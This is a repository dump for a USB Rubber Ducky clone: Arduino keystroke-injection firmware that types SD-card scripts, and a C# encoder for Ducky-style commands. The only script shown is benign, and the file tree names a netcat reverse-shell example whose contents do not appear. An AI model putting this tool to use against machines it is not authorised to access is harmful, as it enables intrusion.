├── Arduino ├── Beetle.jpg ├── Ducky_Clone.ino └── Readme.md ├── Clone_Instructions.pdf ├── Ducky_Commands.pdf ├── Encoder ├── ConsoleEncoder │ ├── DuckyEncoder.sln │ ├── LinuxEncoder │ │ ├── DuckyEncoder.csproj │ │ ├── Program.cs │ │ ├── Properties │ │ │ └── AssemblyInfo.cs │ │ ├── bin │ │ │ └── Debug │ │ │ │ ├── LinuxEncoder.exe │ │ │ │ ├── LinuxEncoder.exe.mdb │ │ │ │ ├── script.bin │ │ │ │ └── testsource.txt │ │ └── obj │ │ │ └── testo │ └── README ├── DuckyEncoder.csproj ├── DuckyEncoder.exe ├── DuckyEncoder.pdb ├── DuckyEncoder.sln ├── DuckyEncoder.v12.suo ├── DuckyEncoder.vshost.exe ├── DuckyEncoder.vshost.exe.manifest ├── Form1.Designer.cs ├── Form1.cs ├── Form1.resx ├── Open_NetCat_ReverseShell_8080.txt ├── Output-Build.txt ├── Program.cs └── UK_KeyboardTest.txt ├── Examples ├── Open_NetCat_ReverseShell_8080.txt ├── readme ├── recon_script_win7_UK.txt └── textSheel.txt └── README.md /Arduino/Beetle.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/basic4/USB-Rubber-Ducky-Clone-using-Arduino-Leonardo-Beetle/f40cc7053f60194fddd1b2876a03c84d4c98dff8/Arduino/Beetle.jpg -------------------------------------------------------------------------------- /Arduino/Ducky_Clone.ino: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | // ********************************************* 6 | // ** BASIC RUBBER DUCKY CLONE v1.1 ** 7 | // ********************************************* 8 | // ** basic4@privatoria.net Sep. 2015 ** 9 | // ** ** 10 | // ** Requires the encodering App to work ** 11 | // ** correctly. ** 12 | // ********************************************* 13 | // ** Dec 2016 - Added Support for altering ** 14 | // ** key press delay time (0xFA) command. ** 15 | // ********************************************* 16 | String filename = "script.bin"; 17 | int multi = 0; 18 | int kill = 0; 19 | int status = 0; 20 | int Key_On_Delay = 20; //default 20msec keypress delay 21 | String result = "READY"; 22 | void sendKeyByte(int inpx) 23 | { 24 | switch(inpx) 25 | { 26 | case 251: 27 | //Start of a multi-key command (eg. CTRL + ALT + DEL) 28 | multi = 1; 29 | break; 30 | case 252: 31 | //The KEY command on (windows 'ALT' keycodes) 32 | multi = 0; 33 | Keyboard.press(130); 34 | delay(50); 35 | break; 36 | case 253: 37 | //Switches KEY command off 38 | multi = 0; 39 | Keyboard.release(130); 40 | delay(10); 41 | break; 42 | case 254: 43 | //End of a multi-key command 44 | multi = 0; 45 | Keyboard.releaseAll(); 46 | delay(10); 47 | break; 48 | default: 49 | if(multi == 0) 50 | { 51 | //Normal Single character code 52 | Keyboard.write(inpx); 53 | delay(Key_On_Delay); 54 | } 55 | else 56 | { 57 | //Part of a multi-key command 58 | Keyboard.press(inpx); 59 | delay(30); 60 | } 61 | break; 62 | } 63 | 64 | 65 | } 66 | 67 | String readFile(String filename) 68 | { 69 | File thisOne; 70 | Serial.println("Opening Password File: " + filename); 71 | if (!SD.begin(10)) 72 | { 73 | return ("SD_ERROR"); 74 | } 75 | char thisFilex[filename.length() + 1]; 76 | filename.toCharArray(thisFilex, filename.length() + 1); 77 | 78 | if (SD.exists(thisFilex)) 79 | { 80 | //Load the file 81 | thisOne = SD.open(thisFilex, FILE_READ); 82 | int macChange = 3; 83 | if (thisOne) 84 | { 85 | while (thisOne.available()) 86 | { 87 | //Read bytes 88 | byte x = thisOne.read(); 89 | if (x > -1) 90 | { 91 | if (x == 0xFA) 92 | { 93 | //set the key press delay time for normal 94 | //characters in a STRING or COMD command 95 | byte a = thisOne.read(); 96 | int k = (int)a; 97 | if(k > 250 || k < 5) 98 | { 99 | Key_On_Delay = 20; 100 | } 101 | else 102 | { 103 | Key_On_Delay = k; 104 | } 105 | 106 | } 107 | if (x == 0xFF) 108 | { 109 | //delay command - read next 2 bytes 110 | byte a = thisOne.read(); 111 | byte b = thisOne.read(); 112 | int deltime = (int)a * (int) b; 113 | delay (deltime); 114 | } 115 | else 116 | { 117 | sendKeyByte((int)x); 118 | } 119 | } 120 | } 121 | thisOne.close(); 122 | return ("DONE"); 123 | } 124 | } 125 | return ("NO_FILE"); 126 | } 127 | 128 | 129 | void setup() { 130 | // put your setup code here, to run once: 131 | pinMode(13, OUTPUT); 132 | digitalWrite(13,LOW); 133 | Serial.begin(9600); 134 | Keyboard.begin(); 135 | delay(300); 136 | result = readFile(filename); 137 | 138 | } 139 | 140 | void loop() { 141 | //Set the Outcome via LED 142 | //SOLID = Completed 143 | //SLOW FLASH = NO CARD 144 | //QUICK FLASH = 'script.bin' not found 145 | if (result=="DONE") 146 | { 147 | digitalWrite(13,HIGH); 148 | } 149 | if(result=="SD_ERROR") 150 | { 151 | while(1) 152 | { 153 | digitalWrite(13,HIGH); 154 | delay(1000); 155 | digitalWrite(13,LOW); 156 | delay(1000); 157 | } 158 | } 159 | if(result=="NO_FILE") 160 | { 161 | while(1) 162 | { 163 | digitalWrite(13,HIGH); 164 | delay(125); 165 | digitalWrite(13,LOW); 166 | delay(125); 167 | } 168 | } 169 | } 170 | -------------------------------------------------------------------------------- /Arduino/Readme.md: -------------------------------------------------------------------------------- 1 | The Arduino Beetle (CJMCU Leonardo) 2 | The .ino file should be upload to beetle via the standard Arduino IDE (http://www.arduino.com) 3 | Please assemble the hardware of the project using the Instructions file. 4 | -------------------------------------------------------------------------------- /Clone_Instructions.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/basic4/USB-Rubber-Ducky-Clone-using-Arduino-Leonardo-Beetle/f40cc7053f60194fddd1b2876a03c84d4c98dff8/Clone_Instructions.pdf -------------------------------------------------------------------------------- /Ducky_Commands.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/basic4/USB-Rubber-Ducky-Clone-using-Arduino-Leonardo-Beetle/f40cc7053f60194fddd1b2876a03c84d4c98dff8/Ducky_Commands.pdf -------------------------------------------------------------------------------- /Encoder/ConsoleEncoder/DuckyEncoder.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 2012 4 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "DuckyEncoder", "LinuxEncoder\DuckyEncoder.csproj", "{8D6CFAAC-A849-456C-9191-FB9297FC0101}" 5 | EndProject 6 | Global 7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 8 | Debug|x86 = Debug|x86 9 | Release|x86 = Release|x86 10 | EndGlobalSection 11 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 12 | {8D6CFAAC-A849-456C-9191-FB9297FC0101}.Debug|x86.ActiveCfg = Debug|x86 13 | {8D6CFAAC-A849-456C-9191-FB9297FC0101}.Debug|x86.Build.0 = Debug|x86 14 | {8D6CFAAC-A849-456C-9191-FB9297FC0101}.Release|x86.ActiveCfg = Release|x86 15 | {8D6CFAAC-A849-456C-9191-FB9297FC0101}.Release|x86.Build.0 = Release|x86 16 | EndGlobalSection 17 | EndGlobal 18 | -------------------------------------------------------------------------------- /Encoder/ConsoleEncoder/LinuxEncoder/DuckyEncoder.csproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Debug 5 | x86 6 | {8D6CFAAC-A849-456C-9191-FB9297FC0101} 7 | Exe 8 | LinuxEncoder 9 | LinuxEncoder 10 | v4.5 11 | 12 | 13 | true 14 | full 15 | false 16 | bin\Debug 17 | DEBUG; 18 | prompt 19 | 4 20 | true 21 | x86 22 | 23 | 24 | full 25 | true 26 | bin\Release 27 | prompt 28 | 4 29 | true 30 | x86 31 | 32 | 33 | 34 | 35 | 36 | 37 | PreserveNewest 38 | 39 | 40 | 41 | 42 | -------------------------------------------------------------------------------- /Encoder/ConsoleEncoder/LinuxEncoder/Program.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.ComponentModel; 4 | using System.Text; 5 | using System.IO; 6 | 7 | namespace DuckyEncoder 8 | { 9 | class MainClass 10 | { 11 | String ScriptToExecute = String.Empty; 12 | BinaryWriter dataStreamWriter; 13 | String mapType = "US"; 14 | Boolean proceed = true; 15 | 16 | public static void Main (string[] args) 17 | { 18 | MainClass thisOne = new MainClass(); 19 | try 20 | { 21 | Console.WriteLine ("starting conversion..."); 22 | Console.WriteLine(""); 23 | if (args [0].ToString ().Length > 5) { 24 | thisOne.findScriptFile (args [0].ToString ()); 25 | if (thisOne.ScriptToExecute.Length > 5) { 26 | thisOne.makeScript(); 27 | } 28 | } 29 | else { 30 | Console.WriteLine ("error: source file seems to be near empty."); 31 | } 32 | thisOne = null; 33 | } 34 | catch (Exception ex) { 35 | Console.WriteLine ("error: did you specify a source script file?"); 36 | } 37 | Console.WriteLine ("exiting..."); 38 | 39 | } 40 | 41 | private void processLine(String comline) 42 | { 43 | String[] parts; 44 | if (comline.StartsWith("STRING")) 45 | { 46 | //Send the string chars one at a time 47 | String resultant = comline.Substring(7); 48 | sendData(resultant); 49 | return; 50 | } 51 | else if (comline.StartsWith("DELAY")) 52 | { 53 | //Wait given millsecs 54 | int delTime = Convert.ToInt32(comline.Substring(6)); 55 | if (delTime > 0) 56 | { 57 | sendData(0xff); //delay command code 58 | int d = delTime; 59 | int dex = 0; 60 | //in units of 50ms 61 | while (d > 0) 62 | { 63 | dex++; 64 | d = d - 50; 65 | } 66 | sendData(dex); 67 | sendData(0x32); 68 | } 69 | return; 70 | } 71 | else if(comline.StartsWith("REM")) 72 | { 73 | //Remark line - just ignore it. 74 | return; 75 | } 76 | else if (comline.StartsWith("ENTER")) 77 | { 78 | //Send a Return 79 | byte k = (byte)176; //'B0' 80 | sendData(k); 81 | return; 82 | } 83 | else if (comline.StartsWith("COMD")) 84 | { 85 | //Send full command line plus return 86 | String resultant = comline.Substring(5); 87 | sendCommandData(resultant); 88 | return; 89 | } 90 | else if (comline.StartsWith("KEY")) 91 | { 92 | //Send a windows ALT key combo (eg. 'ALT + 0124') 93 | //Windows ALT keys( 94 | sendData(252 & 0xff); 95 | //numberpad keys inputs 96 | String nums = comline.Substring(4); 97 | nums = nums.Replace(" ", ""); 98 | nums = nums.Replace(System.Environment.NewLine, ""); 99 | char[] bc = nums.ToCharArray(); 100 | for (int x = 0; x < nums.Length; x++) 101 | { 102 | int ky = getNumericPad(bc[x]); 103 | sendData(ky & 0xff); 104 | } 105 | //signal sequence end 106 | sendData(253 & 0xff); 107 | return; 108 | } 109 | else if (comline.StartsWith("MAP")) 110 | { 111 | String typx = comline.Substring(4); 112 | typx = typx.Replace(" ", ""); 113 | typx = typx.Replace(System.Environment.NewLine, ""); 114 | mapType = typx; 115 | return; 116 | } 117 | else if (comline.StartsWith("KEYDEL")) 118 | { 119 | //Alter default key 'down' time in msecs 120 | String typx = comline.Substring(7); 121 | typx = typx.Replace(" ", ""); 122 | typx = typx.Replace(System.Environment.NewLine, ""); 123 | int del = Convert.ToInt32(typx); 124 | if(del > 4 && del < 251) 125 | { 126 | sendData(250 & 0xff); 127 | sendData(del & 0xff); 128 | return; 129 | } 130 | } 131 | else 132 | { 133 | //Compound Command or Special Key 134 | String[] dif = new String[] { "+" }; 135 | if (comline.IndexOf(dif[0]) > 0) 136 | { 137 | //Multi-Key Special Character 138 | comline = comline.Replace("\\r?\\n", ""); 139 | parts = comline.Split(dif, StringSplitOptions.RemoveEmptyEntries); 140 | 141 | sendData(251 & 0xff); //signal multi start 142 | foreach (String part in parts) 143 | { 144 | String mako = part.Replace(" ", ""); 145 | if (getKeyCode(mako) > 0) 146 | { 147 | sendData(getKeyCode(mako) & 0xff); 148 | } 149 | else 150 | { 151 | sendData(mako); 152 | } 153 | } 154 | sendData(254 & 0xff); //signal multi end 155 | return; 156 | } 157 | else 158 | { 159 | //Single Special Key 160 | parts = new String[1]; 161 | parts[0] = comline.ToString(); 162 | String sect = parts[0].Replace(" ", ""); 163 | if (getKeyCode(sect) > 0) 164 | { 165 | sendData(getKeyCode(sect) & 0xff); 166 | } 167 | return; 168 | } 169 | 170 | } 171 | } 172 | private int getKeyCode(String subcom) 173 | { 174 | //Get the correct keycode 175 | int resultant = 0; 176 | int keyVal = -1; 177 | switch (subcom) 178 | { 179 | case "CTRL": 180 | resultant = 128; 181 | break; 182 | case "SHIFT": 183 | //left shifttest 184 | resultant = 129; 185 | break; 186 | case "ALT": 187 | resultant = 130; 188 | break; 189 | case "TAB": 190 | resultant = 179; 191 | break; 192 | case "GUI": 193 | //left GUI (windows) 194 | resultant = 131; 195 | break; 196 | case "GUI_R": 197 | resultant = 135; 198 | break; 199 | case "ESC": 200 | resultant = 177; 201 | break; 202 | case "MENU": 203 | resultant = 237; 204 | break; 205 | case "BACKSPACE": 206 | resultant = 178; 207 | break; 208 | case "INS": 209 | resultant = 209; 210 | break; 211 | case "DEL": 212 | resultant = 212; 213 | break; 214 | case "HOME": 215 | resultant = 210; 216 | break; 217 | case "ALTGR": 218 | resultant = 134; 219 | break; 220 | case "CTRLR": 221 | resultant = 132; 222 | break; 223 | case "SHIFTR": 224 | resultant = 133; 225 | break; 226 | case "F1": 227 | resultant = 194; 228 | break; 229 | case "F2": 230 | resultant = 195; 231 | break; 232 | case "F3": 233 | resultant = 196; 234 | break; 235 | case "F4": 236 | resultant = 197; 237 | break; 238 | case "F5": 239 | resultant = 198; 240 | break; 241 | case "F6": 242 | resultant = 199; 243 | break; 244 | case "F7": 245 | resultant = 200; 246 | break; 247 | case "F8": 248 | resultant = 201; 249 | break; 250 | case "F9": 251 | resultant = 202; 252 | break; 253 | case "F10": 254 | resultant = 203; 255 | break; 256 | case "F11": 257 | resultant = 204; 258 | break; 259 | case "F12": 260 | resultant = 205; 261 | break; 262 | case "CAPS_LOCK": 263 | resultant = 193; 264 | break; 265 | case "PAGE_UP": 266 | resultant = 211; 267 | break; 268 | case "PAGE_DOWN": 269 | resultant = 214; 270 | break; 271 | case "UP": 272 | resultant = 218; 273 | break; 274 | case "DWN": 275 | resultant = 217; 276 | break; 277 | case "LFT": 278 | resultant = 216; 279 | break; 280 | case "RHT": 281 | resultant = 215; 282 | break; 283 | default: 284 | resultant = keyVal; 285 | break; 286 | } 287 | return (resultant); 288 | } 289 | private char replaceKey(char inp) 290 | { 291 | //Needed because of the keycode differences between 292 | //US and UK keyboards. Others are not supported 293 | char repKey = inp; 294 | switch (mapType) 295 | { 296 | case "UK": 297 | switch ((int)inp) 298 | { 299 | case 64: 300 | //@ 301 | repKey = (char)34; 302 | break; 303 | case 34: 304 | // " 305 | repKey = (char)64; 306 | break; 307 | case 35: 308 | //# 309 | repKey = (char)186; 310 | break; 311 | case 126: 312 | //~ 313 | repKey = (char)124; 314 | break; 315 | case 47: 316 | // Forward slash (/) 317 | repKey = (char)192; 318 | break; 319 | case 92: 320 | // Back slash (\) 321 | repKey = (char)0xec; 322 | break; 323 | default: 324 | repKey = inp; 325 | break; 326 | } 327 | 328 | return (repKey); 329 | } 330 | return (repKey); 331 | } 332 | 333 | int getNumericPad(char inx) 334 | { 335 | //Ruturn the corresponding numeric pad 336 | //keycode 337 | int vx = (int)inx; 338 | if (vx > 48) 339 | { 340 | vx = vx - 48; 341 | return (vx + 224); 342 | } 343 | else 344 | { 345 | return (234); 346 | } 347 | } 348 | 349 | 350 | 351 | void sendCommandData(String inputx) 352 | { 353 | try 354 | { 355 | String msg = inputx; 356 | msg += "\n"; 357 | foreach (byte b in msg.ToCharArray()) 358 | { 359 | if (mapType == "UK" && b == 0x7C) 360 | { 361 | sendUKPipe(); 362 | } 363 | else 364 | { 365 | byte k = (byte)replaceKey((char)(b & 0xff)); 366 | dataStreamWriter.Write((sbyte)k); 367 | } 368 | } 369 | } 370 | catch (Exception ex) 371 | { 372 | errDisp(ex); 373 | } 374 | } 375 | 376 | private void sendData(String inpx) 377 | { 378 | try 379 | { 380 | foreach (byte b in inpx.ToCharArray()) 381 | { 382 | if (mapType == "UK" && b == 0x7C) 383 | { 384 | sendUKPipe(); 385 | } 386 | else 387 | { 388 | char t = replaceKey((char)b); 389 | dataStreamWriter.Write((sbyte)t); 390 | } 391 | } 392 | } 393 | catch (Exception ex) 394 | { 395 | errDisp(ex); 396 | } 397 | } 398 | 399 | private void sendData(byte inx) 400 | { 401 | try 402 | { 403 | if (mapType == "UK" && inx == 0x7C) 404 | { 405 | sendUKPipe(); 406 | } 407 | else 408 | { 409 | dataStreamWriter.Write((sbyte)inx); 410 | } 411 | } 412 | catch (Exception ex) 413 | { 414 | errDisp(ex); 415 | } 416 | } 417 | 418 | private void sendData(int ipx) 419 | { 420 | try 421 | { 422 | ipx = ipx & 0xff; 423 | dataStreamWriter.Write((sbyte)ipx); 424 | } 425 | catch (Exception ex) 426 | { 427 | errDisp(ex); 428 | } 429 | } 430 | 431 | private void sendUKPipe() 432 | { 433 | sendData(251 & 0xff); 434 | sendData(129 & 0xff); 435 | sendData(0xec & 0xff); 436 | sendData(254 & 0xff); 437 | } 438 | 439 | 440 | private void encodeScript(String file) 441 | { 442 | //execute a laoded script line by line 443 | try 444 | { 445 | String[] parts = file.Split(new string[1] { System.Environment.NewLine }, StringSplitOptions.RemoveEmptyEntries); 446 | foreach (String part in parts) 447 | { 448 | processLine(part); 449 | } 450 | } 451 | catch (Exception ex) 452 | { 453 | errDisp(ex); 454 | } 455 | } 456 | 457 | 458 | 459 | private void findScriptFile(string fileToLoad) 460 | { 461 | //find the source script 462 | if (File.Exists(fileToLoad)) 463 | { 464 | try 465 | { 466 | System.IO.StreamReader sr = new System.IO.StreamReader(fileToLoad); 467 | String thisScript = sr.ReadToEnd(); 468 | sr.Close(); 469 | this.ScriptToExecute = thisScript; 470 | Console.WriteLine("file loaded..."); 471 | return; 472 | } 473 | catch (Exception ex) 474 | { 475 | errDisp(ex); 476 | } 477 | } 478 | else 479 | { 480 | Console.WriteLine("can't find file..." + fileToLoad.ToString()); 481 | } 482 | } 483 | 484 | private void makeScript() 485 | { 486 | if (this.ScriptToExecute.Length > 5) 487 | { 488 | try { 489 | if (File.Exists("sctipt.bin")) 490 | { 491 | File.Delete("script.bin"); 492 | } 493 | dataStreamWriter = new BinaryWriter (new FileStream ("script.bin", FileMode.Create)); 494 | encodeScript (this.ScriptToExecute); 495 | dataStreamWriter.Close (); 496 | Console.WriteLine ("script generated OK...'script.bin'"); 497 | } 498 | catch (Exception ex) 499 | { 500 | errDisp (ex); 501 | } 502 | } 503 | else 504 | { 505 | Console.WriteLine ("error: source file seems to be near empty."); 506 | } 507 | } 508 | 509 | private void errDisp(Exception ex) 510 | { 511 | Console.WriteLine("error: " + ex.Message.ToString()); 512 | ex = null; 513 | proceed = false; 514 | } 515 | 516 | 517 | } 518 | 519 | } 520 | -------------------------------------------------------------------------------- /Encoder/ConsoleEncoder/LinuxEncoder/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | 4 | // Information about this assembly is defined by the following attributes. 5 | // Change them to the values specific to your project. 6 | 7 | [assembly: AssemblyTitle ("LinuxEncoder")] 8 | [assembly: AssemblyDescription ("")] 9 | [assembly: AssemblyConfiguration ("")] 10 | [assembly: AssemblyCompany ("")] 11 | [assembly: AssemblyProduct ("")] 12 | [assembly: AssemblyCopyright ("bobo")] 13 | [assembly: AssemblyTrademark ("")] 14 | [assembly: AssemblyCulture ("")] 15 | 16 | // The assembly version has the format "{Major}.{Minor}.{Build}.{Revision}". 17 | // The form "{Major}.{Minor}.*" will automatically update the build and revision, 18 | // and "{Major}.{Minor}.{Build}.*" will update just the revision. 19 | 20 | [assembly: AssemblyVersion ("1.0.*")] 21 | 22 | // The following attributes are used to specify the signing key for the assembly, 23 | // if desired. See the Mono documentation for more information about signing. 24 | 25 | //[assembly: AssemblyDelaySign(false)] 26 | //[assembly: AssemblyKeyFile("")] 27 | 28 | -------------------------------------------------------------------------------- /Encoder/ConsoleEncoder/LinuxEncoder/bin/Debug/LinuxEncoder.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/basic4/USB-Rubber-Ducky-Clone-using-Arduino-Leonardo-Beetle/f40cc7053f60194fddd1b2876a03c84d4c98dff8/Encoder/ConsoleEncoder/LinuxEncoder/bin/Debug/LinuxEncoder.exe -------------------------------------------------------------------------------- /Encoder/ConsoleEncoder/LinuxEncoder/bin/Debug/LinuxEncoder.exe.mdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/basic4/USB-Rubber-Ducky-Clone-using-Arduino-Leonardo-Beetle/f40cc7053f60194fddd1b2876a03c84d4c98dff8/Encoder/ConsoleEncoder/LinuxEncoder/bin/Debug/LinuxEncoder.exe.mdb -------------------------------------------------------------------------------- /Encoder/ConsoleEncoder/LinuxEncoder/bin/Debug/script.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/basic4/USB-Rubber-Ducky-Clone-using-Arduino-Leonardo-Beetle/f40cc7053f60194fddd1b2876a03c84d4c98dff8/Encoder/ConsoleEncoder/LinuxEncoder/bin/Debug/script.bin -------------------------------------------------------------------------------- /Encoder/ConsoleEncoder/LinuxEncoder/bin/Debug/testsource.txt: -------------------------------------------------------------------------------- 1 | MAP UK 2 | DELAY 4000 3 | GUI 4 | DELAY 100 5 | STRING iexplore.exe http://www.bbc.co.uk/news 6 | DELAY 50 7 | ENTER 8 | -------------------------------------------------------------------------------- /Encoder/ConsoleEncoder/LinuxEncoder/obj/testo: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Encoder/ConsoleEncoder/README: -------------------------------------------------------------------------------- 1 | This is a windows console version of the encoder application. The version in the main folder in a windows forms application. 2 | -------------------------------------------------------------------------------- /Encoder/DuckyEncoder.csproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {19657F10-CB2E-4F00-BB2A-80AC1124FB01} 8 | WinExe 9 | Properties 10 | DuckyEncoder 11 | DuckyEncoder 12 | v3.0 13 | 512 14 | 15 | 16 | AnyCPU 17 | true 18 | full 19 | false 20 | bin\Debug\ 21 | DEBUG;TRACE 22 | prompt 23 | 4 24 | 25 | 26 | AnyCPU 27 | pdbonly 28 | true 29 | bin\Release\ 30 | TRACE 31 | prompt 32 | 4 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | Form 45 | 46 | 47 | Form1.cs 48 | 49 | 50 | 51 | 52 | Form1.cs 53 | 54 | 55 | ResXFileCodeGenerator 56 | Resources.Designer.cs 57 | Designer 58 | 59 | 60 | True 61 | Resources.resx 62 | 63 | 64 | SettingsSingleFileGenerator 65 | Settings.Designer.cs 66 | 67 | 68 | True 69 | Settings.settings 70 | True 71 | 72 | 73 | 74 | 81 | -------------------------------------------------------------------------------- /Encoder/DuckyEncoder.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/basic4/USB-Rubber-Ducky-Clone-using-Arduino-Leonardo-Beetle/f40cc7053f60194fddd1b2876a03c84d4c98dff8/Encoder/DuckyEncoder.exe -------------------------------------------------------------------------------- /Encoder/DuckyEncoder.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/basic4/USB-Rubber-Ducky-Clone-using-Arduino-Leonardo-Beetle/f40cc7053f60194fddd1b2876a03c84d4c98dff8/Encoder/DuckyEncoder.pdb -------------------------------------------------------------------------------- /Encoder/DuckyEncoder.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 2013 4 | VisualStudioVersion = 12.0.40629.0 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "DuckyEncoder", "DuckyEncoder\DuckyEncoder.csproj", "{19657F10-CB2E-4F00-BB2A-80AC1124FB01}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Release|Any CPU = Release|Any CPU 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {19657F10-CB2E-4F00-BB2A-80AC1124FB01}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 15 | {19657F10-CB2E-4F00-BB2A-80AC1124FB01}.Debug|Any CPU.Build.0 = Debug|Any CPU 16 | {19657F10-CB2E-4F00-BB2A-80AC1124FB01}.Release|Any CPU.ActiveCfg = Release|Any CPU 17 | {19657F10-CB2E-4F00-BB2A-80AC1124FB01}.Release|Any CPU.Build.0 = Release|Any CPU 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | EndGlobal 23 | -------------------------------------------------------------------------------- /Encoder/DuckyEncoder.v12.suo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/basic4/USB-Rubber-Ducky-Clone-using-Arduino-Leonardo-Beetle/f40cc7053f60194fddd1b2876a03c84d4c98dff8/Encoder/DuckyEncoder.v12.suo -------------------------------------------------------------------------------- /Encoder/DuckyEncoder.vshost.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/basic4/USB-Rubber-Ducky-Clone-using-Arduino-Leonardo-Beetle/f40cc7053f60194fddd1b2876a03c84d4c98dff8/Encoder/DuckyEncoder.vshost.exe -------------------------------------------------------------------------------- /Encoder/DuckyEncoder.vshost.exe.manifest: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | -------------------------------------------------------------------------------- /Encoder/Form1.Designer.cs: -------------------------------------------------------------------------------- 1 | namespace DuckyEncoder 2 | { 3 | partial class frm_Main 4 | { 5 | /// 6 | /// Required designer variable. 7 | /// 8 | private System.ComponentModel.IContainer components = null; 9 | 10 | /// 11 | /// Clean up any resources being used. 12 | /// 13 | /// true if managed resources should be disposed; otherwise, false. 14 | protected override void Dispose(bool disposing) 15 | { 16 | if (disposing && (components != null)) 17 | { 18 | components.Dispose(); 19 | } 20 | base.Dispose(disposing); 21 | } 22 | 23 | #region Windows Form Designer generated code 24 | 25 | /// 26 | /// Required method for Designer support - do not modify 27 | /// the contents of this method with the code editor. 28 | /// 29 | private void InitializeComponent() 30 | { 31 | this.openFileDialog1 = new System.Windows.Forms.OpenFileDialog(); 32 | this.label1 = new System.Windows.Forms.Label(); 33 | this.button1 = new System.Windows.Forms.Button(); 34 | this.textBox1 = new System.Windows.Forms.TextBox(); 35 | this.button2 = new System.Windows.Forms.Button(); 36 | this.button3 = new System.Windows.Forms.Button(); 37 | this.label2 = new System.Windows.Forms.Label(); 38 | this.SuspendLayout(); 39 | // 40 | // openFileDialog1 41 | // 42 | this.openFileDialog1.FileName = "openFileDialog1"; 43 | // 44 | // label1 45 | // 46 | this.label1.AutoSize = true; 47 | this.label1.Location = new System.Drawing.Point(81, 9); 48 | this.label1.Name = "label1"; 49 | this.label1.Size = new System.Drawing.Size(80, 13); 50 | this.label1.TabIndex = 0; 51 | this.label1.Text = "Script File Input"; 52 | // 53 | // button1 54 | // 55 | this.button1.Location = new System.Drawing.Point(15, 25); 56 | this.button1.Name = "button1"; 57 | this.button1.Size = new System.Drawing.Size(63, 23); 58 | this.button1.TabIndex = 1; 59 | this.button1.Text = "Load"; 60 | this.button1.UseVisualStyleBackColor = true; 61 | this.button1.Click += new System.EventHandler(this.button1_Click); 62 | // 63 | // textBox1 64 | // 65 | this.textBox1.Location = new System.Drawing.Point(84, 28); 66 | this.textBox1.Name = "textBox1"; 67 | this.textBox1.Size = new System.Drawing.Size(480, 20); 68 | this.textBox1.TabIndex = 2; 69 | // 70 | // button2 71 | // 72 | this.button2.Location = new System.Drawing.Point(489, 64); 73 | this.button2.Name = "button2"; 74 | this.button2.Size = new System.Drawing.Size(75, 23); 75 | this.button2.TabIndex = 3; 76 | this.button2.Text = "Exit"; 77 | this.button2.UseVisualStyleBackColor = true; 78 | this.button2.Click += new System.EventHandler(this.button2_Click); 79 | // 80 | // button3 81 | // 82 | this.button3.Location = new System.Drawing.Point(369, 64); 83 | this.button3.Name = "button3"; 84 | this.button3.Size = new System.Drawing.Size(93, 23); 85 | this.button3.TabIndex = 4; 86 | this.button3.Text = "Encode"; 87 | this.button3.UseVisualStyleBackColor = true; 88 | this.button3.Click += new System.EventHandler(this.button3_Click); 89 | // 90 | // label2 91 | // 92 | this.label2.AutoSize = true; 93 | this.label2.Font = new System.Drawing.Font("Tahoma", 8.25F, System.Drawing.FontStyle.Bold, System.Drawing.GraphicsUnit.Point, ((byte)(0))); 94 | this.label2.ForeColor = System.Drawing.Color.Blue; 95 | this.label2.Location = new System.Drawing.Point(81, 69); 96 | this.label2.Name = "label2"; 97 | this.label2.Size = new System.Drawing.Size(167, 13); 98 | this.label2.TabIndex = 5; 99 | this.label2.Text = "PRESS \'LOAD\' TO SELECT FILE"; 100 | // 101 | // frm_Main 102 | // 103 | this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 13F); 104 | this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font; 105 | this.ClientSize = new System.Drawing.Size(578, 101); 106 | this.ControlBox = false; 107 | this.Controls.Add(this.label2); 108 | this.Controls.Add(this.button3); 109 | this.Controls.Add(this.button2); 110 | this.Controls.Add(this.textBox1); 111 | this.Controls.Add(this.button1); 112 | this.Controls.Add(this.label1); 113 | this.FormBorderStyle = System.Windows.Forms.FormBorderStyle.FixedDialog; 114 | this.Name = "frm_Main"; 115 | this.Text = "Ducky_Encoder (basic4@privatoria.net)"; 116 | this.Load += new System.EventHandler(this.frm_Main_Load); 117 | this.ResumeLayout(false); 118 | this.PerformLayout(); 119 | 120 | } 121 | 122 | #endregion 123 | 124 | private System.Windows.Forms.OpenFileDialog openFileDialog1; 125 | 